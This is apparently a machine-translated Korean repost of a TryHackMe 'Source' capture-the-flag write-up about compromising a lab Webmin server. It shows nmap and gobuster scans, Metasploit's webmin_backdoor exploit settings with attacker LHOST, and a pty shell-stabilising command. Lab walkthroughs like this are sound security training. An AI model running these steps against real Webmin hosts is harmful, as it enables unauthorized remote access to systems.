TryHackMe(THM)-소스 작성
원천
최근 취약점을 악용하여 웹 기반 시스템 구성 도구인 Webmin을 해킹합니다.
객실 링크는 여기link
작업 1
이 작업에 연결된 상자를 열거하고 루팅합니다. 중단의 원인을 발견하고 이를 활용하여 제어할 수 있습니까?
모든 챌린지에서와 같이 nmap으로 ip를 스캔하여 챌린지를 시작하겠습니다.
10.10.38.68 -> 소스.thm
nmap -sV -sC -A source.thm
출력:
링크는 다음과 같습니다.
https://10.10.38.68:10000
불행히도 우리는 ssh와 webmin에 대한 사용자 이름과 암호를 모르고 gobuster로 디렉토리를 검색하려고 시도했지만 아무것도 없습니다.
gobuster dir -u https://10.10.38.68:10000 -w /usr/share/wordlists/dirb/common.txt
마지막 옵션은 Metasploit에서 익스플로잇을 찾는 것이었습니다.
그리고 네, 더 많은 취약점이 있으며 제가 사용한 익스플로잇은 5 “exploit/linux/http/webmin_backdoor” 입니다.
이제 다음 명령에 따라 LPORT, RHOSTS 및 ssl을 true로 설정해야 합니다.
set RHOSTS 10.10.38.68 (Machine IP)
set LHOST 10.11.61.213 (YOUR IP)
set ssl true
이제 익스플로잇을 실행하려면 간단히 run/exploit를 입력하십시오.
안정적인 쉘을 사용하려면 다음 명령을 실행하십시오.
echo "import pty; pty.spawn('/bin/bash')" > /tmp/anyname.py
python /tmp/anyname.py
그리고 붐!! 우리는 안정적인 껍질을 가지고 있습니다
이제 우리가 해야 할 일은 깃발을 찾는 것뿐입니다.
Reference
이 문제에 관하여(TryHackMe(THM)-소스 작성), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://dev.to/ionut11/thm-source-writeup-2p0f텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
우수한 개발자 콘텐츠 발견에 전념 (Collection and Share based on the CC Protocol.)